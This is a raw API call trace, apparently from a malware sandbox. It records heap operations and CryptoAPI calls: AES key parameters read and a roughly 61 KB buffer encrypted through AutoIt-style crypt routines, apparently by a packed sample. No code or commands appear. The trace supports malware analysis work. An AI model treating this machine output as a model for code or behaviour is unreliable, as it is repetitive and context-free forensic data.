RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0164.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0164.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0164.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0164.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0164.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0164.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0164.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0164.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0164.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0164.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0164.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0164.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0164.741] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0164.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0164.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0164.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0164.743] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0164.743] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2838, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2838*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.744] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0164.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.745] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0164.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0164.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0164.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0164.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0164.745] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.745] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.745] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.745] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.745] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.745] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.745] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0164.745] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.745] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0164.745] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.745] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0164.745] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.745] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.746] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.746] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.746] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.746] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.746] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.746] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.746] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.747] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xefde, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xefe0) returned 1 [0164.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.748] CharLowerBuffW (in: lpsz="byte[61409]", cchLength=0xb | out: lpsz="byte[61409]") returned 0xb [0164.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.750] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.750] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.750] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.750] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa48008*, pdwDataLen=0x87e820*=0xefde, dwBufLen=0xefe0 | out: pbData=0xa48008*, pdwDataLen=0x87e820*=0xefe0) returned 1 [0164.751] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.751] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.751] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.753] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.753] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0164.753] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.754] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0164.754] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.754] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.754] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.754] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.754] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0164.754] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.754] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.754] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.760] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.760] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.760] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.765] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.765] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.765] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0164.765] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 